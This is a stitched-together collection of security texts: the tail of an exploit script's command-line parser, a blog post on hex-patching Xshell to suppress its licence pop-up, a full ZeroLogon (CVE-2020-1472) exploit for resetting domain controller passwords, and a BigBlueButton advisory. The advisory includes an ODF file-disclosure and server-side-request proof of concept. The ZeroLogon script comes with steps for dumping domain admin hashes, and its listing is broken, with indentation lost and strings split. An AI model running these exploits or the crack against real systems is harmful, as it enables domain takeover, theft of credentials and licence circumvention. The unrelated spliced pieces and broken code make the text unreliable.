help='Command to execute: touch /tmp/pwn')
# action='store' keeps the raw string, so any non-empty value (including
# the literal "False") is truthy and enables debugging below.
parser.add_argument('-debug', action='store', default=False,
help='Enable debugging: False')
parser.add_argument('-proxy', action='store', default='',
help='Enable proxy: 10.10.10.10:8080')
if len(argv) == 1:
parser.print_help()
exit(1)
options = parser.parse_args()
exp = Exploit(
proxy_address=options.proxy,
target=options.target
)
if options.debug:
exp.debug()
stdout.write('target %s debug %s proxy %s\n' % (
options.target, options.debug, options.proxy
))
result = exp.send_payload(command=options.command)
stdout.write('Response: %d\n' % result.status_code)
# Any failure is reduced to a one-line stderr message (no trailing newline,
# no traceback), which hides the real cause of connection or argument errors.
except Exception as error:
stderr.write('error in main %s' % str(error))
xshel and xftp are one of my favorite and common tools. Many advantages have been improved since Xshell upgraded to the seventh version. Because my cousin refused to accept life, he could only use the free version. However, after using the free version, there will be a pop-up window of free declaration. I cannot tolerate this for patients with obsessive-compulsive disorder. This article solves this problem through our assembly method!
Beginner
Since it is a pop-up window, many security tools have the function of pop-up blocking. (360 Turquoise Tencent Butler) both contain this function. So we just need to intercept it.
Here, we have Tencent as an example.
Set the following to intercept immediately!
But at the moment the software is closed, something will come out. (Of course this is also something that patients with obsessive-compulsive disorder cannot tolerate)
Assembly Decompile
Required Compilation Tool 010Editor
Official website download https://www.sweetscape.com/010editor/
Download the 010Editor binary modification tool, free trial for 30 days, enough.
Be careful to backup first! 010Editor Open xshell.exe, search globally 74 11 6A 00 6A 07 6A 01, change the beginning 74 to EB (note that it is capitalized) and save
Effect
Video Explanation
# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege
# Date: 2020-10-04
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2
# Tested on: Microsoft Windows Server 2016 Standard x64
# CVE : CVE-2020-1472
# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code
# Sources: https://www.secura.com/pathtoimg.php?id=2055
# Requirements: python3 and impacket 0.9.21+ (tested using this version)
#!/usr/bin/env python3
import hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs
from binascii import hexlify, unhexlify
from subprocess import check_call
from impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED
from impacket.dcerpc.v5 import nrpc, epm, transport
from impacket import crypto, version
from impacket.examples import logger
from Cryptodome.Cipher import AES
from struct import pack, unpack
from impacket.dcerpc.v5.rpcrt import DCERPCException
class Exploit:
# CVE-2020-1472 (ZeroLogon). Netlogon's AES-CFB8 credential scheme accepts an
# all-zero client challenge/credential for a small fraction of attempts, so
# authenticate() retries until the DC accepts one, after which exploit()
# sets the machine account password via NetrServerPasswordSet2 and restore()
# puts the original password back. Mitigation: the August 2020 Netlogon
# update enforces secure RPC and rejects these attempts. NOTE(review):
# indentation was lost in this copy and some string literals are wrapped
# across lines, so the listing does not run as-is.
# name: NETBIOS name of the DC (a trailing '$' is stripped, then re-added for
# accountName). attempts: cap for the authenticate() loop. password: only
# used by restore().
def __init__(
self,
name='',
address='',
attempts=2000,
password=''
):
name = name.rstrip('$')
self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\
.ServerSecureChannel
# All-zero credential with timestamp 0; restore() replaces it with a real one.
self.authenticator = self.getAuthenticator(stamp=0)
# 516 zero bytes; presumably represents an empty new password once decrypted
# with the zero session key -- confirm against MS-NRPC.
self.clearNewPasswordBlob = b'\x00' * 516
# RPC strings are NUL-terminated by hand.
self.primaryName = ('\\\\%s' % name) + '\x00'
self.accountName = ('%s$' % name) + '\x00'
self.computerName = name + '\x00'
# The all-zero challenge and credential at the heart of the bug.
self.clientCredential = b'\x00' * 8
self.clientChallenge = b'\x00' * 8
# Value taken from the public PoC; presumably selects AES without sign/seal
# -- confirm against MS-NRPC negotiate flags.
self.negotiateFlags = 0x212fffff
self.address = address
self.max = attempts
self.dce = None
self.sessionKey = None
self.clientStoredCredential = None
self.password = password
# Builds the 516-byte password blob: password right-aligned in a 512-byte
# zero-padded field, followed by its little-endian 32-bit length. str input
# is UTF-8 encoded. NOTE(review): no length check -- a password longer than
# 512 bytes makes the padding count negative (b'\x00' * n is b'' for n < 0)
# and the blob oversized.
def encodePassword(self, password):
if isinstance(password, str):
password = password.encode('utf-8')
return b'\x00' * (512 - len(password))\
+ password \
+ pack('<L', len(password))
# Returns a NETLOGON_AUTHENTICATOR with the given credential and timestamp
# (defaults: zero credential, timestamp 10).
def getAuthenticator(self, creds=b'\x00' * 8, stamp=10):
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = creds
authenticator['Timestamp'] = stamp
return authenticator
# Resolves the NRPC endpoint via the endpoint mapper, connects, binds, and
# sends the stored client challenge. Returns the NetrServerReqChallenge
# response, or None after logging if anything raised (BaseException is
# caught, so KeyboardInterrupt is swallowed here too).
def serverReqChallenge(self):
try:
binding = epm.hept_map(
self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'
)
self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()
self.dce.connect()
self.dce.bind(nrpc.MSRPC_UUID_NRPC)
return nrpc.hNetrServerReqChallenge(
self.dce,
self.primaryName,
self.computerName,
self.clientChallenge
)
except BaseException as ex:
self.logError(ex)
# One NetrServerAuthenticate3 attempt with the stored client credential.
# Returns True when the DC accepted it. A DCERPCSessionError with code
# 0xc0000022 (STATUS_ACCESS_DENIED) is the expected rejection: self.dce is
# cleared and None is returned so the caller's loop continues. Any other
# error code or exception aborts via logFail (sys.exit). The `assert` is
# stripped under python -O. NOTE(review): which block the trailing
# `self.dce = None` belongs to cannot be recovered from this unindented copy.
def serverAuthenticate(self):
try:
auth = nrpc.hNetrServerAuthenticate3(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.clientCredential,
self.negotiateFlags
)
assert auth['ErrorCode'] == 0
self.logInfo('successfully authenticated')
return True
except nrpc.DCERPCSessionError as ex:
self.dce = None
if ex.get_error_code() == 0xc0000022:
return None
else:
self.logFail(ex.get_error_code())
except BaseException as ex:
self.dce = None
self.logFail(ex)
self.dce = None
# Sends NetrServerPasswordSet2 with the current authenticator and password
# blob. Returns the response, or None after logging on any exception.
def serverPasswordSet(self):
try:
return nrpc.hNetrServerPasswordSet2(
self.dce,
self.primaryName,
self.accountName,
self.secureChannelType,
self.computerName,
self.authenticator,
self.clearNewPasswordBlob
)
except BaseException as ex:
self.logError(ex)
# Retry loop: up to self.max challenge/authenticate rounds. Because
# serverAuthenticate clears self.dce on rejection, a non-None self.dce
# after the call signals acceptance and ends the loop. Returns True on
# success, otherwise logs an error and returns None. NOTE(review):
# serverAuthenticate is called even when serverReqChallenge failed and
# left self.dce None; that presumably raises and exits via logFail.
def authenticate(self):
self.logInfo(
'checking target, attempting to authenticate %d max
attempts' % self.max
)
for attempt in range(0, self.max):
self.logInfo('attempt %d' % attempt)
self.serverReqChallenge()
self.serverAuthenticate()
if self.dce is not None:
break
if self.dce:
return True
else:
self.logError('failed to authenticate')
# Resets the machine account password using the zero authenticator and blob
# prepared in __init__. Requires a prior successful authenticate(). Returns
# self. NOTE(review): if serverPasswordSet returned None (it logged and
# swallowed an exception), reset['ErrorCode'] raises TypeError here.
def exploit(self):
self.logInfo('attempting password reset')
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully reset password')
else:
self.logError('failed to reset password')
return self
# Thin wrapper over impacket's credential computation using the current
# session key (None until restore() sets it).
def ComputeNetlogonCredentialAES(self, challenge):
return nrpc.ComputeNetlogonCredentialAES(
challenge,
self.sessionKey
)
# Writes an info line to stdout; returns self for chaining.
def logInfo(self, message):
sys.stdout.write("[+] %s\n" % str(message))
return self
# Writes a non-fatal error line to stderr.
def logError(self, message):
sys.stderr.write("[-] error %s\n" % str(message))
# Writes a failure line to stderr and terminates the process with status 2.
def logFail(self, message):
sys.stderr.write("[!] failure %s\n" % str(message))
sys.exit(2)
# Restores the machine account password supplied at construction. Uses a
# fixed non-zero challenge and an empty string as the machine password when
# deriving the session key (presumably the state left by exploit() -- confirm),
# computes a real client credential, builds an authenticator from the stored
# credential plus 10 (matching getAuthenticator's default stamp of 10 --
# confirm the pairing is intentional), encrypts the password blob with the
# session key and sends NetrServerPasswordSet2. STATUS_DOWNGRADE_DETECTED
# from the authenticate step is tolerated, though serverAuthenticate catches
# its own exceptions so that handler may be unreachable. Returns self.
def restore(self):
self.logInfo('attempting to restore password')
self.clientChallenge = b'12345678'
try:
self.primaryName = NULL
challenge = self.serverReqChallenge()
self.sessionKey = nrpc.ComputeSessionKeyAES(
'', self.clientChallenge, challenge['ServerChallenge']
)
self.clientCredential = self.ComputeNetlogonCredentialAES(
self.clientChallenge
)
try:
self.serverAuthenticate()
except Exception as e:
if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:
raise
self.logInfo('restoring password')
self.clientStoredCredential = pack('<Q', unpack('<Q',
self.clientCredential)[0] + 10)
self.authenticator = self.getAuthenticator(
creds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)
)
self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(
self.encodePassword(self.password)
)
reset = self.serverPasswordSet()
if reset['ErrorCode'] == 0:
self.logInfo('successfully restored password')
else:
self.logError('failed to restore password')
except Exception as ex:
self.logError(ex)
return self
if __name__ == '__main__':
# CLI entry point. -do selects check (authenticate only), exploit
# (authenticate, then reset the password) or restore (needs -hex, converted
# with unhexlify to bytes, or -password). Note that every argument is
# optional; -target and -ip have no defaults.
info = """
NOTE - Exploitation will break the DC until restored, recommended guidelines:
1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:
cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>
2. Exploit the DC - this will break the DC until restored:
cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>
3. Dump the DC - for the DA hashes, this will not contain the
machine hex-pass:
secretsdump.py -just-dc -no-pass <NETBIOS NAME>\$@<IP>
4. Dump the DC again - use the DA hash to get the machines hex-pass:
secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>
5. Restore target - this fixes the DC:
cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>
-hex <HEXPASS>
"""
parser = argparse.ArgumentParser(
description='CVE-2020-1472 ZeroLogon Exploit - Netlogon
Elevation of Privilege',
add_help=True
)
try:
parser.add_argument('-do', default='check', action='store',
help='What to do (default check):
[check|restore|exploit]')
parser.add_argument('-target', action='store',
help='NETBIOS name of target DC (not the FQDN)')
parser.add_argument('-ip', action='store',
help='IP address of target DC')
parser.add_argument('-password', default='', action='store',
help='The plaintext password to use to
reset the DC')
parser.add_argument('-hex', default='', action='store',
help='The hex password to use to restore
the DC (recommended)')
# Stored as a string; converted with int() below, so a non-numeric value
# raises and lands in the generic handler at the bottom.
parser.add_argument('-max', default=2000, action='store',
help='Max attempts to authenticate with
the DC (usually ~300 or less)')
if len(sys.argv) < 3:
parser.print_help()
print(info)
sys.exit(1)
options = parser.parse_args()
if options.do.lower() == 'check':
Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
).authenticate()
elif options.do.lower() == 'exploit':
exp = Exploit(
name=options.target,
address=options.ip,
attempts=int(options.max)
)
if exp.authenticate():
exp.exploit()
elif options.do.lower() == 'restore':
# -hex takes precedence only when -password was not given.
if options.hex != '' and options.password == '':
options.password = unhexlify(options.hex)
if options.password != '':
# `exp` is assigned but not used afterwards.
exp = Exploit(
name=options.target,
address=options.ip,
password=options.password
).restore()
else:
parser.print_help()
# Reduces any failure to a single stderr line without a traceback.
except Exception as error:
sys.stderr.write('[-] error in main %s\n' % str(error))
# Exploit Title: BigBlueButton 2.2.25 - Arbitrary File Disclosure and Server-Side Request Forgery
# Date: 2020-09-11
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://bigbluebutton.org/
# Version: BigBlueButton 2.2.25
RedTeam Pentesting discovered a vulnerability in the BigBlueButton web
conferencing system which allows participants of a conference with
permissions to upload presentations to read arbitrary files from the
file system and perform server-side requests. This leads to
administrative access to the BigBlueButton instance.
Details
=======
Product: BigBlueButton
Affected Versions: 2.2.25, potentially earlier versions as well
Fixed Versions: 2.2.27
Vulnerability Type: Arbitrary File Disclosure and
Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://bigbluebutton.org/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-005
Advisory Status: published
CVE: CVE-2020-25820
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25820
Introduction
============
"BigBlueButton is a web conferencing system designed for online
learning."
(from the vendor's homepage)
More Details
============
BigBlueButton is a web conferencing system that allows participants with
the appropriate privileges to upload files in various formats to be used
as presentation slides. Among other formats, BigBlueButton accepts
LibreOffice documents[1]. LibreOffice documents use the XML-based Open
Document Format for Office Applications (ODF)[2]. For technical
purposes, uploaded files are converted to PDF format with LibreOffice
and afterwards to SVG for displaying[6].
The ODF file format supports using the XML Linking Language (XLink) to
create links between documents[3]. When local files are referenced using
XLinks, the contents of the respective files are included in the
generated PDF file when BigBlueButton converts ODF documents with
LibreOffice. This leads to an arbitrary file disclosure vulnerability,
allowing malicious participants of conferences to extract files from the
BigBlueButton server's file system.
LibreOffice also embeds XLinks to remote locations when a document is
converted, which allows to perform server-side requests.
Proof of Concept
================
Start from an empty ODF Text Document and extract the content:
$ mkdir tmp-doc && cd tmp-doc
$ unzip ../empty.odt
Archive: empty.odt
extracting: mimetype
creating: Configurations2/accelerator/
creating: Configurations2/images/Bitmaps/
creating: Configurations2/toolpanel/
creating: Configurations2/progressbar/
creating: Configurations2/statusbar/
creating: Configurations2/toolbar/
creating: Configurations2/floater/
creating: Configurations2/popupmenu/
creating: Configurations2/menubar/
inflating: manifest.rdf
inflating: meta.xml
inflating: settings.xml
extracting: Thumbnails/thumbnail.png
inflating: styles.xml
inflating: content.xml
inflating: META-INF/manifest.xml
Replace the <office:body> element in the file content.xml with the
following:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="file:///etc/passwd"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
The text document now includes a section that references the external
file /etc/passwd. Create a new ODF Text Document with the modified
content:
$ zip -r ../modified.odt *
The document can now be uploaded as a presentation. After the
conversion, the presentation shows the contents of the file
/etc/passwd from the system running the BigBlueButton conferencing
software. To perform server-side requests, substitute the xlink:href
attribute's value with a remote URL such as http://example.com:
<office:body>
<office:text>
<text:section text:name="string">
<text:section-source
xlink:href="http://example.com"
xlink:type="simple"
xlink:show="embed"
xlink:actuate="onLoad"/>
</text:section>
</office:text>
</office:body>
When converting a document with this content, LibreOffice will fetch the
website's content and embed it into the generated PDF file.
Workaround
==========
To work around this issue, the conversion feature should be disabled if
it is not used. Otherwise, permission to upload presentations should
only be given to trusted users. Additionally, the allowed file types for
upload can be restricted to just PDF files.
Fix
===
Update to fixed version 2.2.27. Change API key after update.
Security Risk
=============
As shown, the presentation conversion feature of BigBlueButton can be
used to disclose arbitrary local files. Through the file disclosure,
attackers can gain access to the credentials of the BigBlueButton
instance (/usr/share/bbb-web/WEB-INF/classes/bigbluebutton.properties,
/usr/share/bbb-apps-akka/conf/application.conf), which allows for
administrative access to BigBlueButton through its API (see [5]),
including all conferences.
Additionally, it is possible to perform server-side requests. Note that
this vulnerability is different from CVE-2018-10583 [4], because the
risk is not the disclosure of credentials sent while fetching remote
resources, but the ability to access resources that are in the same
network segment as the BigBlueButton instance, which is possibly not
accessible from the Internet.
To exploit this vulnerability, attackers need to have access to a
conference with the ability to upload presentations. While successful
exploitation of this vulnerability would pose severe consequences for
the affected BigBlueButton instance, it is only rated as a medium
risk due to the requirement of having presenter access.
Timeline
========
2020-09-11 Vulnerability identified
2020-09-18 Customer approved disclosure to vendor
2020-09-22 CVE ID requested
2020-09-22 CVE ID assigned
2020-09-24 Requested encrypted communication with vendor
2020-09-25 Vendor unable to provide encrypted communication,
Vendor notified
2020-09-25 Vendor confirmed being able to reproduce vulnerability,
mentioned similar bugreport
2020-09-25 Requested information whether the "similar bugreport"
uses the same vulnerability - no answer
2020-10-13 Again requested information whether the "similar bugreport"
uses the same vulnerability and whether a release schedule is
known - no answer
2020-10-14 Vendor released fixed version (without mentioning vulnerability)
2020-10-21 Vulnerability published by third party [7]
2020-10-21 Advisory released
References
==========
[1] https://docs.bigbluebutton.org/support/faq.html#can-i-upload-microsoft-office-documents-to-bigbluebutton
[2] http://opendocumentformat.org/
[3] https://www.w3.org/TR/xlink11/
[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10583
[5] https://docs.bigbluebutton.org/dev/api.html#usage
[6] https://docs.bigbluebutton.org/support/faq.html#presentations
[7] https://www.golem.de/news/big-blue-button-das-grosse-blaue-sicherheitsrisiko-2010-151610.html
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen